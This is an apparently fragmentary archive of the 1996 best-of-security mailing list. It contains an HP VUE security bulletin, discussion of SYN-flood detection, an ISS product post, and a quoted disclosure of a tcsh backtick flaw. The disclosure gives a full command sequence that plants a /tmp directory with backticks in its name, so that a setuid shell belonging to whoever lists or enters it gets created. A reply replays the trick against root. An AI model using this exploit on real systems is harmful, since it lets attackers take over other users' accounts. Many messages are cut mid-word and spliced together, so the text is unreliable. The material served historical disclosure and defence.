From hargiss@michelob.wustl.edu Sat Sep 14 15:51:54 1996 Received: from bitcom.ch ([193.192.228.9]) by suburbia.net (8.7.4/Proff-950810) with SMTP id PAA03363 for ; Sat, 14 Sep 1996 15:51:44 +1000 Date: Sat, 14 Sep 1996 15:51:44 +1000 From: hargiss@michelob.wustl.edu Message-Id: <199609140551.PAA03363@suburbia.net> Received: from [193.192.228.39] by bitcom.ch (SMTPD32-3.00) id A82E39250234; Sat Sep 14 07:52:46 1996 Received: by scout.net (Amiga SMTPpost 1.04 December 9, 1994) id AA01; Sat, 14 Sep 96 07:52:49 CET ) To: best-of-security@suburbia.net Organization: The Global ScoutNet Organization =============================================================================== ***HP SupportLine Mail Service Notice*** This digest contains a summary of all newly received Security Bulletins. You do not have to have any form of support from Hewlett-Packard to subscribe to this digest or to procure the recommended patches via the HP SupportLine mail service. cessary to obtain additional information. ------------------------------------------------------------------------------- If you would like to be REMOVED from this mailing lists, send the following (in the TEXT PORTION OF THE MESSAGE) to the HP SupportLine mail service. To: support@us.external.hp.com Message Text: unsubscribe security_info =============================================================================== Digest Name: security_info Description: Daily Security Bulletins Digest Created: Thu Sep 12 16:46:16 1996 PDT ------------------------------------------------------------------------------- Summary of 'Daily Security Bulletins Digest' documents ------------------------------------------------------------------------------- Document Id Description Page 1 ------------------------------------------------------------------------------- HPSBUX9609-038 Security Vulnerability in HP VUE3.0 =============================================================================== Detailed list of 'Daily Security Bulletins Digest' documents =============================================================================== Document Id: [HPSBUX9609-038] Date Loaded: [09-12-96] Description: Security Vulnerability in HP VUE3.0 =============================================================================== ------------------------------------------------------------------------- HEWLETT-PACKARD SECURITY BULLETIN: HPSBUX9609-038, 10 September 1996 ------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett Packard will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. ------------------------------------------------------------------------- PROBLEM: Using Vue 3.0 on only HP-UX releases 10.01 and 10.10 it is possible to increase privileges and launch denial of service attacks. PLATFORM: HP 9000 series 700/800 systems running only versions 10.01 and nstructions are contained within the patches. D. To subscribe to automatically receive future NEW HP Security Bulletins from the HP SupportLine mail service via electronic mail, send an email message to: support@us.external.hp.com (no Subject is required) Multiple instructions are allowed in the TEXT PORTION OF THE MESSAGE, here are some basic instructions you may want to use: To add your name to the subscription list for new security bulletins, send the following in the TEXT PORTION OF THE MESSAGE: subscribe security_info To retrieve the index of all HP Security Bulletins issued to date, send the following in the TEXT PORTION OF THE MESSAGE: send security_info_list To get a patch matrix of current HP-UX and BLS security patches referenced by either Security Bulletin or Platform/OS, put the following in the text portion of your message: send hp-ux_patch_matrix World Wide Web service for browsing of bulletins is available via our URL: (http://us.external.hp.com) Choose "Support news", then under Support news, choose "Security Bulletins" E. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. ________________________________________________________________________ >From dsaxer Sat, 14 Sep 96 06:13:16 CET remote from scout.net Received: from pdx1.world.net by scout.net (AmigaSMTPd 0.69 Dec 9, 1994) with SMTP; Sat, 14 Sep 96 06:13:12 CET Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id VAA05025; Fri, 13 Sep 1996 21:11:07 -0700 (PDT) Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id LAA21086; Sat, 14 Sep 1996 11:11:47 +1000 Resent-Date: Sat, 14 Sep 1996 11:11:47 +1000 From: Nate Lawson Message-Id: <199609140108.SAA13467@kdat.calpoly.edu> Date: Fri, 13 Sep 1996 18:08:21 -0700 (PDT) In-Reply-To: <19960913201635.2522.qmail@onyx.infonexus.com> from "route@onyx.infonexus.com" at Sep 13, 96 01:16:35 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Resent-Message-ID: <"xGrOA.0.H95.7PWEo"@suburbia> Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/365 X-Loop: best-of-security@suburbia.net Precedence: list Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: Tool for stopping SYN floods To: route@onyx.infonexus.com Cc: best-of-security@suburbia.net > | With the routers for most ISP, they should be blocking any non-internal > | addresses from leaving their network and going to the Internet. This will > | stop an attacker if their ISP implements this. Unfortunately, this does > | not stop an attack from areas on the Internet that do not block that. But key part is doing careful traffic analysis. Any type of denial of service attack, no matter how random the headers, will fit into a very specific category. In fact, the randomness of the header can be a signature in itself. > Neither of these are ideal. The first scenario destroys the anonimity > of the attack. The second is adds much complexity to an otherwise > simple DOS attack. Both of them destroy the anonyminity of the attack by limiting the source of the attack to one very specific network. At the present, attacks have to be traced back through the NAPs. This requires manual analysis, time, and extra YN floods: > >Kernel mod or daemon that will: > -listen for all incoming SYNs > -keep a list of the x most recent incoming SYNs (x=backlog?) This is already done to handle the incoming requests. > -if x amount of connection-requests take more than y amount of time > to complete and(other heuristics) This is what the mentioned product does (among other things). > -x SYNs arrived in z time relative to each other. > -x SYNs have a,b,c features in common (source IP addr,TTL,port,seq#) > -etc... T Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id VAA05040; Fri, 13 Sep 1996 21:11:25 -0700 (PDT) Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id LAA28410; Sat, 14 Sep 1996 11:50:30 +1000 Received: from bitcom.ch ([193.192.228.9]) by suburbia.net (8.7.4/Proff-950810) with SMTP id LAA28374 for ; Sat, 14 Sep 1996 11:49:41 +1000 Date: Sat, 14 Sep 1996 11:49:41 +1000 From: soth@soth.users.mindspring.com Message-Id: <199609140149.LAA28374@suburbia.net> ic consumption: > > I feel it is highly suspicious that you should release tool for RST'ing SYN > flooding attacks, at roughly the same time a hacker magazine (which one of > your employees edits) releases code for the above mentioned attacks. Have you considered that maybe the bumped up the production schedule to get something out to protect against it. Also note the evaluation is FREE!!!!! (although I expect they will over charge for it like their other products). > > NAA07751; Sat, 14 Sep 1996 13:51:24 +1000 Resent-Date: Sat, 14 Sep 1996 13:51:24 +1000 Date: Fri, 13 Sep 1996 22:53:11 -0400 (EDT) From: "Michael J. Hartwick" In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Resent-Message-ID: <"5v-En1.0.vu1.jkYEo"@suburbia> Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/367 X-Loop: best-of-security@suburbia.net ------ jim# whoami root jim# echo $SHELL /bin/bash jim# I just like to check that sometimes. jim# Hey, I'm bored maybe I'll check /tmp for some neato stuff jim# cd /tmp jim# ls `source .WaReZ` jim# OH BOY!!! the jack pot! jim# cd *WaReZ* jim# ls jim# oh, oh well maybe I'll check later... jim# cd ----------------------------Cut to More Bad guy-------------------------- jim% bash #whoami root # hah. ---------------------------End Unix Parable------------------------------- On Fri, 13 Sep 1996, test wrote: >A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed >out with BSDI anyway.) that allows the execution of arbitrary commands >when changing into directories that are enclosed with back tic's. The >problem might also prove to be quite bad to tcsh scripts that find >themselves changing into directories on the fly. > >Here is probably one of the dumbest methods possible that could be used to >exploit this weakness. > >----------------------------Cut to Bad guy-------------------------------- > >jim% whoami >Evol bad guy >jim% mkdir /tmp/\`source\ .WaReZ\` >jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ >jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ >jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ >jim% chmod +x /tmp/*W*/.WaReZ > >---------------------------Cut to unsuspecting foo------------------------ > >jim% whoami >Unsuspecting foo >jim% echo $SHELL >/bin/tcsh >jim% I just like to check that sometimes. >jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff >jim% cd /tmp >jim% ls > >`source .WaReZ` > >jim% OH BOY!!! the jack pot! >jim% cd *WaReZ* >jim% ls > >jim% oh, oh well maybe I'll check later... >jim% cd $HOME > >----------------------------Cut to More Bad guy-------------------------- > >jim% ls -a /tmp/*W*/ > >. >.. >.24753 > >jim% /tmp/*W*/.24753 >$whoami >unsuspecting foo >$ hah. >---------------------------End Unix Parable------------------------------- > ---------------------------------------------------------------------------- 13 Sep 1996 19:21:52 -0700 (PDT) Message-Id: <199609140221.TAA02619@pdx1.world.net> Received: from [193.192.228.39] by bitcom.ch (SMTPD32-3.00) id A6C39AB0264; Sat Sep 14 04:21:55 1996 Received: by scout.net (Amiga SMTPpost 1.04 December 9, 1994) id AA01; Sat, 14 Sep 96 04:21:56 CET ity@suburbia.net> archive/latest/353 X-Loop: best-of-security@suburbia.net Precedence: list Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: Attacks against NetBIOS via TCP/IP To: BUGTRAQ@NETSPACE.ORG, best-of-security@suburbia.net at, 14 Sep 96 03:10:16 CET ct: ISS has been developing the technology for real-time attack recognition and response (RealSecure) for over twelve months. In collabaration with our customers, universities, and our partners, ISS has undertaken a significant investment in time and resources to deliver a comprehensive tool to detect numerous kinds of attacks, only one of which is the SYN d the (heavily UNIX-inclined) >security guys :-) > >-- >> Bernd Lehle - Stuttgart University Computer Center * A supercomputer < by suburbia.net (8.7.4/Proff-950810) with SMTP id HAA12706 for ; Fri, 13 Sep 1996 07:15:13 +1000 d.net by scout.net (AmigaSMTPd 0.69 Dec 9, 1994) with SMTP; Sat, 14 Sep 96 03:58:27 CET Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id OAA27166 for ; Thu, 12 Sep 1996 14:15:52 -0700 (PDT) From: best-of-security-request@suburbia.net Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id HAA12743 for Tiago.Franco@Scout.Net; Fri, 13 Sep 1996 07:15:37 +1000 rmation hasn't appeared on this list yet, then SEND IT. It is far better to run the risk of minor duplication in exchange for having the information out where it is needed than act conservatively about occasional doubling up on content. We do, of course take original posts. In the famous last words of Marylin Munroe, CORE Digest and Joachim Kroll: "meat, we want meat". s such as Blond jokes. those on the ethics of full NEW or hard to obtain security disclosure or computer hackers. u have to consider we're only made out of dust. That's admittedly not much to go on and we shouldn't forget that. But even considering, I mean it's sort of a bad beginning, we're not doing too bad. So I personally have faith that even in this lousy situation we're faced with we can make it. You get me?" - Leo Burlero/PKD +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff@suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+